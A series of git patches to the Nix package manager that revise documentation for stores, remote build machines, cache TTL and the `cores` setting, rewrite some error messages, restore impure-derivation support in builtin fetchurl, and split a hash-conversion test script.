diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 13b2906f7..51f1e3a71 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -59,18 +59,21 @@
 
 - [store]{#gloss-store}
 
-  A collection of store objects, with operations to manipulate that collection.
-  See [Nix store](./store/index.md) for details.
+  A collection of [store objects][store object], with operations to manipulate that collection.
+  See [Nix Store](./store/index.md) for details.
 
-  There are many types of stores.
-  See [`nix help-stores`](@docroot@/command-ref/new-cli/nix3-help-stores.md) for a complete list.
-
-  From the perspective of the location where Nix is invoked, the Nix store can be  referred to _local_ or _remote_.
-  Only a [local store]{#gloss-local-store} exposes a location in the file system of the machine where Nix is invoked that allows access to store objects, typically `/nix/store`.
-  Local stores can be used for building [derivations](#gloss-derivation).
-  See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
+  There are many types of stores, see [Store Types](./store/types/index.md) for details.
 
   [store]: #gloss-store
+
+- [local store]{#gloss-local-store}
+
+  From the perspective of the location where Nix is invoked, the Nix [store] can be referred to _local_ or _remote_.
+  Only a local store exposes a file system directory, typically `/nix/store`, to allow operating system processes to directly access store objects.
+  Local stores can be used for building [derivations][derivation].
+
+  See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
+
   [local store]: #gloss-local-store
 
 - [chroot store]{#gloss-chroot-store}
@@ -87,7 +90,7 @@
 
 - [store path]{#gloss-store-path}
 
-  The location of a [store object](@docroot@/store/index.md#store-object) in the file system, i.e., an immediate child of the Nix store directory.
+  The location of a [store object] in the file system, i.e., an immediate child of the Nix store directory.
 
   > **Example**
   >

From e37d50289509dcac2303bc4de7065879dd58c731 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 13:34:51 +0100
Subject: [PATCH 460/654] add instructions to wipe the substituter lookup cache
 (#9498)

* add instructions to wipe the substituter lookup cache
---
 src/libstore/globals.hh | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index 070e252b6..941adba78 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -793,10 +793,17 @@ public:
     Setting ttlNegativeNarInfoCache{
         this, 3600, "narinfo-cache-negative-ttl",
         R"(
-          The TTL in seconds for negative lookups. If a store path is queried
-          from a substituter but was not found, there will be a negative
-          lookup cached in the local disk cache database for the specified
-          duration.
+          The TTL in seconds for negative lookups.
+          If a store path is queried from a [substituter](#conf-substituters) but was not found, there will be a negative lookup cached in the local disk cache database for the specified duration.
+
+          Set to `0` to force updating the lookup cache.
+
+          To wipe the lookup cache completely:
+
+          ```shell-session
+          $ rm $HOME/.cache/nix/binary-cache-v*.sqlite*
+          # rm /root/.cache/nix/binary-cache-v*.sqlite*
+          ```
         )"};
 
     Setting ttlPositiveNarInfoCache{

From fd82ba0985aefc2a5498045f0caf16f8b2566cf1 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 14:13:56 +0100
Subject: [PATCH 461/654] extract reference documentation on remote builds
 (#9526)

- move all reference documentation to the `builders` configuration setting
- reword documentation on machine specification, add examples
- disable showing the default value, as it rendered as `@/dummy/machines`, which is wrong
- highlight the examples
- link to the configuration docs for distributed builds
- builder -> build machine

Co-authored-by: Janik H 
---
 doc/manual/redirects.js                       |   2 +-
 .../src/advanced-topics/distributed-builds.md | 101 ++-------------
 doc/manual/src/contributing/hacking.md        |   4 +-
 doc/manual/src/glossary.md                    |   2 +-
 .../src/language/advanced-attributes.md       |   2 +-
 doc/manual/src/language/derivations.md        |   2 +-
 src/libstore/build/derivation-goal.cc         |  10 +-
 src/libstore/build/worker.cc                  |  22 +++-
 src/libstore/globals.hh                       | 118 +++++++++++++++++-
 9 files changed, 152 insertions(+), 111 deletions(-)

diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js
index d04f32b49..27ab1853c 100644
--- a/doc/manual/redirects.js
+++ b/doc/manual/redirects.js
@@ -18,7 +18,7 @@ const redirects = {
     "chap-tuning-cores-and-jobs": "advanced-topics/cores-vs-jobs.html",
     "chap-diff-hook": "advanced-topics/diff-hook.html",
     "check-dirs-are-unregistered": "advanced-topics/diff-hook.html#check-dirs-are-unregistered",
-    "chap-distributed-builds": "advanced-topics/distributed-builds.html",
+    "chap-distributed-builds": "command-ref/conf-file.html#conf-builders",
     "chap-post-build-hook": "advanced-topics/post-build-hook.html",
     "chap-post-build-hook-caveats": "advanced-topics/post-build-hook.html#implementation-caveats",
     "chap-writing-nix-expressions": "language/index.html",
diff --git a/doc/manual/src/advanced-topics/distributed-builds.md b/doc/manual/src/advanced-topics/distributed-builds.md
index 507c5ecb7..52acd039c 100644
--- a/doc/manual/src/advanced-topics/distributed-builds.md
+++ b/doc/manual/src/advanced-topics/distributed-builds.md
@@ -36,16 +36,8 @@ error: cannot connect to 'mac'
 then you need to ensure that the `PATH` of non-interactive login shells
 contains Nix.
 
-> **Warning**
->
-> If you are building via the Nix daemon, it is the Nix daemon user account (that is, `root`) that should have SSH access to a user (not necessarily `root`) on the remote machine.
->
-> If you can’t or don’t want to configure `root` to be able to access the remote machine, you can use a private Nix store instead by passing e.g. `--store ~/my-nix` when running a Nix command from the local machine.
-
-The list of remote machines can be specified on the command line or in
-the Nix configuration file. The former is convenient for testing. For
-example, the following command allows you to build a derivation for
-`x86_64-darwin` on a Linux machine:
+The [list of remote build machines](@docroot@/command-ref/conf-file.md#conf-builders) can be specified on the command line or in the Nix configuration file.
+For example, the following command allows you to build a derivation for `x86_64-darwin` on a Linux machine:
 
 ```console
 $ uname
@@ -60,97 +52,20 @@ $ cat ./result
 Darwin
 ```
 
-It is possible to specify multiple builders separated by a semicolon or
-a newline, e.g.
+It is possible to specify multiple build machines separated by a semicolon or a newline, e.g.
 
 ```console
   --builders 'ssh://mac x86_64-darwin ; ssh://beastie x86_64-freebsd'
 ```
 
-Each machine specification consists of the following elements, separated
-by spaces. Only the first element is required. To leave a field at its
-default, set it to `-`.
-
-1.  The URI of the remote store in the format
-    `ssh://[username@]hostname`, e.g. `ssh://nix@mac` or `ssh://mac`.
-    For backward compatibility, `ssh://` may be omitted. The hostname
-    may be an alias defined in your `~/.ssh/config`.
-
-2.  A comma-separated list of Nix platform type identifiers, such as
-    `x86_64-darwin`. It is possible for a machine to support multiple
-    platform types, e.g., `i686-linux,x86_64-linux`. If omitted, this
-    defaults to the local platform type.
-
-3.  The SSH identity file to be used to log in to the remote machine. If
-    omitted, SSH will use its regular identities.
-
-4.  The maximum number of builds that Nix will execute in parallel on
-    the machine. Typically this should be equal to the number of CPU
-    cores. For instance, the machine `itchy` in the example will execute
-    up to 8 builds in parallel.
-
-5.  The “speed factor”, indicating the relative speed of the machine. If
-    there are multiple machines of the right type, Nix will prefer the
-    fastest, taking load into account.
-
-6.  A comma-separated list of *supported features*. If a derivation has
-    the `requiredSystemFeatures` attribute, then Nix will only perform
-    the derivation on a machine that has the specified features. For
-    instance, the attribute
-
-    ```nix
-    requiredSystemFeatures = [ "kvm" ];
-    ```
-
-    will cause the build to be performed on a machine that has the `kvm`
-    feature.
-
-7.  A comma-separated list of *mandatory features*. A machine will only
-    be used to build a derivation if all of the machine’s mandatory
-    features appear in the derivation’s `requiredSystemFeatures`
-    attribute.
-
-8.  The (base64-encoded) public host key of the remote machine. If omitted, SSH
-    will use its regular known-hosts file. Specifically, the field is calculated
-    via `base64 -w0 /etc/ssh/ssh_host_ed25519_key.pub`.
-
-For example, the machine specification
-
-    nix@scratchy.labs.cs.uu.nl  i686-linux      /home/nix/.ssh/id_scratchy_auto        8 1 kvm
-    nix@itchy.labs.cs.uu.nl     i686-linux      /home/nix/.ssh/id_scratchy_auto        8 2
-    nix@poochie.labs.cs.uu.nl   i686-linux      /home/nix/.ssh/id_scratchy_auto        1 2 kvm benchmark
-
-specifies several machines that can perform `i686-linux` builds.
-However, `poochie` will only do builds that have the attribute
-
-```nix
-requiredSystemFeatures = [ "benchmark" ];
-```
-
-or
-
-```nix
-requiredSystemFeatures = [ "benchmark" "kvm" ];
-```
-
-`itchy` cannot do builds that require `kvm`, but `scratchy` does support
-such builds. For regular builds, `itchy` will be preferred over
-`scratchy` because it has a higher speed factor.
-
-Remote builders can also be configured in `nix.conf`, e.g.
+Remote build machines can also be configured in [`nix.conf`](@docroot@/command-ref/conf-file.md), e.g.
 
     builders = ssh://mac x86_64-darwin ; ssh://beastie x86_64-freebsd
 
-Finally, remote builders can be configured in a separate configuration
-file included in `builders` via the syntax `@file`. For example,
+Finally, remote build machines can be configured in a separate configuration
+file included in `builders` via the syntax `@/path/to/file`. For example,
 
     builders = @/etc/nix/machines
 
-causes the list of machines in `/etc/nix/machines` to be included. (This
-is the default.)
-
-If you want the builders to use caches, you likely want to set the
-option `builders-use-substitutes` in your local `nix.conf`.
-
-To build only on remote builders and disable building on the local
-machine, you can use the option `--max-jobs 0`.
+causes the list of machines in `/etc/nix/machines` to be included.
+(This is the default.)
diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md
index 9e2470859..6c9be3635 100644
--- a/doc/manual/src/contributing/hacking.md
+++ b/doc/manual/src/contributing/hacking.md
@@ -147,10 +147,10 @@ Nix can be built for various platforms, as specified in [`flake.nix`]:
 
 In order to build Nix for a different platform than the one you're currently
 on, you need a way for your current Nix installation to build code for that
-platform. Common solutions include [remote builders] and [binary format emulation]
+platform. Common solutions include [remote build machines] and [binary format emulation]
 (only supported on NixOS).
 
-[remote builders]: ../advanced-topics/distributed-builds.md
+[remote builders]: @docroot@/language/derivations.md#attr-builder
 [binary format emulation]: https://nixos.org/manual/nixos/stable/options.html#opt-boot.binfmt.emulatedSystems
 
 Given such a setup, executing the build only requires selecting the respective attribute.
diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 13b2906f7..359f727d7 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -37,7 +37,7 @@
   This can be achieved by:
   - Fetching a pre-built [store object] from a [substituter]
   - Running the [`builder`](@docroot@/language/derivations.md#attr-builder) executable as specified in the corresponding [derivation]
-  - Delegating to a [remote builder](@docroot@/advanced-topics/distributed-builds.html) and retrieving the outputs
+  - Delegating to a [remote machine](@docroot@/command-ref/conf-file.md#conf-builders) and retrieving the outputs
   
 
   See [`nix-store --realise`](@docroot@/command-ref/nix-store/realise.md) for a detailed description of the algorithm.
diff --git a/doc/manual/src/language/advanced-attributes.md b/doc/manual/src/language/advanced-attributes.md
index 5a6c00cd4..7306fc182 100644
--- a/doc/manual/src/language/advanced-attributes.md
+++ b/doc/manual/src/language/advanced-attributes.md
@@ -257,7 +257,7 @@ Derivations can declare some infrequently used optional attributes.
     of the environment (typically, a few hundred kilobyte).
 
   - [`preferLocalBuild`]{#adv-attr-preferLocalBuild}\
-    If this attribute is set to `true` and [distributed building is enabled](../advanced-topics/distributed-builds.md), then, if possible, the derivation will be built locally instead of being forwarded to a remote machine.
+    If this attribute is set to `true` and [distributed building is enabled](@docroot@/command-ref/conf-file.md#conf-builders), then, if possible, the derivation will be built locally instead of being forwarded to a remote machine.
     This is useful for derivations that are cheapest to build locally.
 
   - [`allowSubstitutes`]{#adv-attr-allowSubstitutes}\
diff --git a/doc/manual/src/language/derivations.md b/doc/manual/src/language/derivations.md
index cbb30d074..75f824a34 100644
--- a/doc/manual/src/language/derivations.md
+++ b/doc/manual/src/language/derivations.md
@@ -36,7 +36,7 @@ It outputs an attribute set, and produces a [store derivation] as a side effect
   The system type on which the [`builder`](#attr-builder) executable is meant to be run.
 
   A necessary condition for Nix to build derivations locally is that the `system` attribute matches the current [`system` configuration option].
-  It can automatically [build on other platforms](../advanced-topics/distributed-builds.md) by forwarding build requests to other machines.
+  It can automatically [build on other platforms](@docroot@/language/derivations.md#attr-builder) by forwarding build requests to other machines.
 
   [`system` configuration option]: @docroot@/command-ref/conf-file.md#conf-system
 
diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc
index 1b326ee13..29bf2852f 100644
--- a/src/libstore/build/derivation-goal.cc
+++ b/src/libstore/build/derivation-goal.cc
@@ -780,9 +780,13 @@ void DerivationGoal::tryToBuild()
 
 void DerivationGoal::tryLocalBuild() {
     throw Error(
-        "unable to build with a primary store that isn't a local store; "
-        "either pass a different '--store' or enable remote builds."
-        "\nhttps://nixos.org/manual/nix/stable/advanced-topics/distributed-builds.html");
+        R"(
+        Unable to build with a primary store that isn't a local store;
+        either pass a different '--store' or enable remote builds.
+
+        For more information check 'man nix.conf' and search for '/machines'.
+        )"
+    );
 }
 
 
diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc
index d57e22393..3a34f4006 100644
--- a/src/libstore/build/worker.cc
+++ b/src/libstore/build/worker.cc
@@ -331,13 +331,23 @@ void Worker::run(const Goals & _topGoals)
             if (awake.empty() && 0U == settings.maxBuildJobs)
             {
                 if (getMachines().empty())
-                   throw Error("unable to start any build; either increase '--max-jobs' "
-                            "or enable remote builds."
-                            "\nhttps://nixos.org/manual/nix/stable/advanced-topics/distributed-builds.html");
+                   throw Error(
+                        R"(
+                        Unable to start any build;
+                        either increase '--max-jobs' or enable remote builds.
+
+                        For more information run 'man nix.conf' and search for '/machines'.
+                        )"
+                    );
                 else
-                   throw Error("unable to start any build; remote machines may not have "
-                            "all required system features."
-                            "\nhttps://nixos.org/manual/nix/stable/advanced-topics/distributed-builds.html");
+                   throw Error(
+                        R"(
+                        Unable to start any build;
+                        remote machines may not have all required system features.
+
+                        For more information run 'man nix.conf' and search for '/machines'.
+                        )"
+                    );
 
             }
             assert(!awake.empty());
diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index 941adba78..fa2dc8681 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -270,9 +270,121 @@ public:
     Setting builders{
         this, "@" + nixConfDir + "/machines", "builders",
         R"(
-          A semicolon-separated list of build machines.
-          For the exact format and examples, see [the manual chapter on remote builds](../advanced-topics/distributed-builds.md)
-        )"};
+          A semicolon- or newline-separated list of build machines.
+
+          In addition to the [usual ways of setting configuration options](@docroot@/command-ref/conf-file.md), the value can be read from a file by prefixing its absolute path with `@`.
+
+          > **Example**
+          >
+          > This is the default setting:
+          >
+          > ```
+          > builders = @/etc/nix/machines
+          > ```
+
+          Each machine specification consists of the following elements, separated by spaces.
+          Only the first element is required.
+          To leave a field at its default, set it to `-`.
+
+          1. The URI of the remote store in the format `ssh://[username@]hostname`.
+
+             > **Example**
+             >
+             > `ssh://nix@mac`
+
+             For backward compatibility, `ssh://` may be omitted.
+             The hostname may be an alias defined in `~/.ssh/config`.
+
+          2. A comma-separated list of [Nix system types](@docroot@/contributing/hacking.md#system-type).
+             If omitted, this defaults to the local platform type.
+
+             > **Example**
+             >
+             > `aarch64-darwin`
+
+             It is possible for a machine to support multiple platform types.
+
+             > **Example**
+             >
+             > `i686-linux,x86_64-linux`
+
+          3. The SSH identity file to be used to log in to the remote machine.
+             If omitted, SSH will use its regular identities.
+
+             > **Example**
+             >
+             > `/home/user/.ssh/id_mac`
+
+          4. The maximum number of builds that Nix will execute in parallel on the machine.
+             Typically this should be equal to the number of CPU cores.
+
+          5. The “speed factor”, indicating the relative speed of the machine as a positive integer.
+             If there are multiple machines of the right type, Nix will prefer the fastest, taking load into account.
+
+          6. A comma-separated list of supported [system features](#conf-system-features).
+
+             A machine will only be used to build a derivation if all the features in the derivation's [`requiredSystemFeatures`](@docroot@/language/advanced-attributes.html#adv-attr-requiredSystemFeatures) attribute are supported by that machine.
+
+          7. A comma-separated list of required [system features](#conf-system-features).
+
+             A machine will only be used to build a derivation if all of the machine’s required features appear in the derivation’s [`requiredSystemFeatures`](@docroot@/language/advanced-attributes.html#adv-attr-requiredSystemFeatures) attribute.
+
+          8. The (base64-encoded) public host key of the remote machine.
+             If omitted, SSH will use its regular `known_hosts` file.
+
+             The value for this field can be obtained via `base64 -w0`.
+
+          > **Example**
+          >
+          > Multiple builders specified on the command line:
+          >
+          > ```console
+          > --builders 'ssh://mac x86_64-darwin ; ssh://beastie x86_64-freebsd'
+          > ```
+
+          > **Example**
+          >
+          > This specifies several machines that can perform `i686-linux` builds:
+          >
+          > ```
+          > nix@scratchy.labs.cs.uu.nl i686-linux /home/nix/.ssh/id_scratchy 8 1 kvm
+          > nix@itchy.labs.cs.uu.nl    i686-linux /home/nix/.ssh/id_scratchy 8 2
+          > nix@poochie.labs.cs.uu.nl  i686-linux /home/nix/.ssh/id_scratchy 1 2 kvm benchmark
+          > ```
+          >
+          > However, `poochie` will only build derivations that have the attribute
+          >
+          > ```nix
+          > requiredSystemFeatures = [ "benchmark" ];
+          > ```
+          >
+          > or
+          >
+          > ```nix
+          > requiredSystemFeatures = [ "benchmark" "kvm" ];
+          > ```
+          >
+          > `itchy` cannot do builds that require `kvm`, but `scratchy` does support such builds.
+          > For regular builds, `itchy` will be preferred over `scratchy` because it has a higher speed factor.
+
+          For Nix to use substituters, the calling user must be in the [`trusted-users`](#conf-trusted-users) list.
+
+          > **Note**
+          >
+          > A build machine must be accessible via SSH and have Nix installed.
+          > `nix` must be available in `$PATH` for the user connecting over SSH.
+
+          > **Warning**
+          >
+          > If you are building via the Nix daemon (default), the Nix daemon user account on the local machine (that is, `root`) requires access to a user account on the remote machine (not necessarily `root`).
+          >
+          > If you can’t or don’t want to configure `root` to be able to access the remote machine, set [`store`](#conf-store) to any [local store](@docroot@/store/types/local-store.html), e.g. by passing `--store /tmp` to the command on the local machine.
+
+          To build only on remote machines and disable local builds, set [`max-jobs`](#conf-max-jobs) to 0.
+
+          If you want the remote machines to use substituters, set [`builders-use-substitutes`](#conf-builders-use-substituters) to `true`.
+        )",
+        {}, false};
 
     Setting alwaysAllowSubstitutes{
         this, false, "always-allow-substitutes",

From bb63bd50e6d817e5ca52c1d1d21232164a64f993 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 13 Feb 2024 14:14:20 +0100
Subject: [PATCH 462/654] : Restore support for "impure =
 true"

---
 src/libstore/builtins/fetchurl.cc      | 8 ++++----
 tests/functional/fetchurl.sh           | 2 +-
 tests/functional/impure-derivations.sh | 4 ++++
 3 files changed, 9 insertions(+), 5 deletions(-)

diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc
index a9f2e748e..559efcc17 100644
--- a/src/libstore/builtins/fetchurl.cc
+++ b/src/libstore/builtins/fetchurl.cc
@@ -20,9 +20,8 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData)
     if (!out)
         throw Error("'builtin:fetchurl' requires an 'out' output");
 
-    auto dof = std::get_if(&out->raw);
-    if (!dof)
-        throw Error("'builtin:fetchurl' must be a fixed-output derivation");
+    if (!(drv.type().isFixed() || drv.type().isImpure()))
+        throw Error("'builtin:fetchurl' must be a fixed-output or impure derivation");
 
     auto getAttr = [&](const std::string & name) {
         auto i = drv.env.find(name);
@@ -67,7 +66,8 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData)
     };
 
     /* Try the hashed mirrors first. */
-    if (dof->ca.method.getFileIngestionMethod() == FileIngestionMethod::Flat)
+    auto dof = std::get_if(&out->raw);
+    if (dof && dof->ca.method.getFileIngestionMethod() == FileIngestionMethod::Flat)
         for (auto hashedMirror : settings.hashedMirrors.get())
             try {
                 if (!hasSuffix(hashedMirror, "/")) hashedMirror += '/';
diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh
index 5a05cc5e1..a3620f52b 100644
--- a/tests/functional/fetchurl.sh
+++ b/tests/functional/fetchurl.sh
@@ -83,4 +83,4 @@ test -L $outPath/symlink
 requireDaemonNewerThan "2.20"
 expected=100
 if [[ -v NIX_DAEMON_PACKAGE ]]; then expected=1; fi # work around the daemon not returning a 100 status correctly
-expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation'
+expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output or impure derivation'
diff --git a/tests/functional/impure-derivations.sh b/tests/functional/impure-derivations.sh
index 39d053a04..54ed6f5dd 100644
--- a/tests/functional/impure-derivations.sh
+++ b/tests/functional/impure-derivations.sh
@@ -63,3 +63,7 @@ path5=$(nix build -L --no-link --json --file ./impure-derivations.nix contentAdd
 path6=$(nix build -L --no-link --json --file ./impure-derivations.nix inputAddressedAfterCA | jq -r .[].outputs.out)
 [[ $(< $path6) = X ]]
 [[ $(< $TEST_ROOT/counter) = 5 ]]
+
+# Test nix/fetchurl.nix.
+path7=$(nix build -L --no-link --print-out-paths --expr "import  { impure = true; url = file://$PWD/impure-derivations.sh; }")
+cmp $path7 $PWD/impure-derivations.sh

From 39c353f6fa40a5e0ace9e2c3e69848108944845c Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 14:52:51 +0100
Subject: [PATCH 463/654] reword description of the `cores` setting (#9522)

* reword description of the `cores` setting

- be precise about the `builder` executable
- clearly distinguish between `builder` and job parallelism
- clarify the role of `mkDerivation` in the example
- remove prose for the default, it's shown programmatically
- mention relation to `max-jobs`
---
 src/libstore/globals.hh | 23 +++++++++++++++--------
 1 file changed, 15 insertions(+), 8 deletions(-)

diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index fa2dc8681..8330d6571 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -180,14 +180,21 @@ public:
         getDefaultCores(),
         "cores",
         R"(
-          Sets the value of the `NIX_BUILD_CORES` environment variable in the
-          invocation of builders. Builders can use this variable at their
-          discretion to control the maximum amount of parallelism. For
-          instance, in Nixpkgs, if the derivation attribute
-          `enableParallelBuilding` is set to `true`, the builder passes the
-          `-jN` flag to GNU Make. It can be overridden using the `--cores`
-          command line switch and defaults to `1`. The value `0` means that
-          the builder should use all available CPU cores in the system.
+          Sets the value of the `NIX_BUILD_CORES` environment variable in the [invocation of the `builder` executable](@docroot@/language/derivations.md#builder-execution) of a derivation.
+          The `builder` executable can use this variable to control its own maximum amount of parallelism.
+
+          
+          For instance, in Nixpkgs, if the attribute `enableParallelBuilding` for the `mkDerivation` build helper is set to `true`, it will pass the `-j${NIX_BUILD_CORES}` flag to GNU Make.
+
+          The value `0` means that the `builder` should use all available CPU cores in the system.
+
+          > **Note**
+          >
+          > The number of parallel local Nix build jobs is independently controlled with the [`max-jobs`](#conf-max-jobs) setting.
         )",
         {"build-cores"},
         // Don't document the machine-specific default value

From 8bebf9607cbf07fbf0f98d835f20df1f9736d5ff Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 09:37:45 -0500
Subject: [PATCH 464/654] Split `hash.sh` test in two

Converting hashes and hashing files are pretty separate tasks, and more
test parallelism is better.
---
 tests/functional/hash-convert.sh           | 105 +++++++++++++++++++++
 tests/functional/{hash.sh => hash-path.sh} | 104 --------------------
 tests/functional/local.mk                  |   3 +-
 3 files changed, 107 insertions(+), 105 deletions(-)
 create mode 100644 tests/functional/hash-convert.sh
 rename tests/functional/{hash.sh => hash-path.sh} (51%)

diff --git a/tests/functional/hash-convert.sh b/tests/functional/hash-convert.sh
new file mode 100644
index 000000000..9b3afc10b
--- /dev/null
+++ b/tests/functional/hash-convert.sh
@@ -0,0 +1,105 @@
+source common.sh
+
+# Conversion with `nix hash` `nix-hash` and `nix hash convert`
+try3() {
+    # $1 = hash algo
+    # $2 = expected hash in base16
+    # $3 = expected hash in base32
+    # $4 = expected hash in base64
+    h64=$(nix hash convert --hash-algo "$1" --to base64 "$2")
+    [ "$h64" = "$4" ]
+    h64=$(nix-hash --type "$1" --to-base64 "$2")
+    [ "$h64" = "$4" ]
+    # Deprecated experiment
+    h64=$(nix hash to-base64 --type "$1" "$2")
+    [ "$h64" = "$4" ]
+
+    sri=$(nix hash convert --hash-algo "$1" --to sri "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix-hash --type "$1" --to-sri "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash to-sri --type "$1" "$2")
+    [ "$sri" = "$1-$4" ]
+    h32=$(nix hash convert --hash-algo "$1" --to base32 "$2")
+    [ "$h32" = "$3" ]
+    h32=$(nix-hash --type "$1" --to-base32 "$2")
+    [ "$h32" = "$3" ]
+    h32=$(nix hash to-base32 --type "$1" "$2")
+    [ "$h32" = "$3" ]
+    h16=$(nix-hash --type "$1" --to-base16 "$h32")
+    [ "$h16" = "$2" ]
+
+    h16=$(nix hash convert --hash-algo "$1" --to base16 "$h64")
+    [ "$h16" = "$2" ]
+    h16=$(nix hash to-base16 --type "$1" "$h64")
+    [ "$h16" = "$2" ]
+    h16=$(nix hash convert --to base16 "$sri")
+    [ "$h16" = "$2" ]
+    h16=$(nix hash to-base16 "$sri")
+    [ "$h16" = "$2" ]
+
+    #
+    # Converting from SRI
+    #
+
+    # Input hash algo auto-detected from SRI and output defaults to SRI as well.
+    sri=$(nix hash convert "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --from sri "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --to sri "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --from sri --to sri "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --to base64 "$1-$4")
+    [ "$sri" = "$4" ]
+
+    #
+    # Auto-detecting the input from algo and length.
+    #
+
+    sri=$(nix hash convert --hash-algo "$1" "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$3")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --hash-algo "$1" "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$3")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$4")
+    [ "$sri" = "$1-$4" ]
+
+    #
+    # Asserting input format succeeds.
+    #
+
+    sri=$(nix hash convert --hash-algo "$1" --from base16 "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" --from nix32 "$3")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" --from base64 "$4")
+    [ "$sri" = "$1-$4" ]
+
+    #
+    # Asserting input format fails.
+    #
+
+    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?")
+    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
+    fail=$(nix hash convert --hash-algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?")
+    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
+    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?")
+    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
+
+}
+
+try3 sha1 "800d59cfcd3c05e900cb4e214be48f6b886a08df" "vw46m23bizj4n8afrc0fj19wrp7mj3c0" "gA1Zz808BekAy04hS+SPa4hqCN8="
+try3 sha256 "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0="
+try3 sha512 "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" "12k9jiq29iyqm03swfsgiw5mlqs173qazm3n7daz43infy12pyrcdf30fkk3qwv4yl2ick8yipc2mqnlh48xsvvxl60lbx8vp38yji0" "IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ=="
diff --git a/tests/functional/hash.sh b/tests/functional/hash-path.sh
similarity index 51%
rename from tests/functional/hash.sh
rename to tests/functional/hash-path.sh
index ff270076e..6d096b29b 100644
--- a/tests/functional/hash.sh
+++ b/tests/functional/hash-path.sh
@@ -80,107 +80,3 @@ try2 md5 "20f3ffe011d4cfa7d72bfabef7882836"
 rm $TEST_ROOT/hash-path/hello
 ln -s x $TEST_ROOT/hash-path/hello
 try2 md5 "f78b733a68f5edbdf9413899339eaa4a"
-
-# Conversion with `nix hash` `nix-hash` and `nix hash convert`
-try3() {
-    # $1 = hash algo
-    # $2 = expected hash in base16
-    # $3 = expected hash in base32
-    # $4 = expected hash in base64
-    h64=$(nix hash convert --hash-algo "$1" --to base64 "$2")
-    [ "$h64" = "$4" ]
-    h64=$(nix-hash --type "$1" --to-base64 "$2")
-    [ "$h64" = "$4" ]
-    # Deprecated experiment
-    h64=$(nix hash to-base64 --type "$1" "$2")
-    [ "$h64" = "$4" ]
-
-    sri=$(nix hash convert --hash-algo "$1" --to sri "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix-hash --type "$1" --to-sri "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash to-sri --type "$1" "$2")
-    [ "$sri" = "$1-$4" ]
-    h32=$(nix hash convert --hash-algo "$1" --to base32 "$2")
-    [ "$h32" = "$3" ]
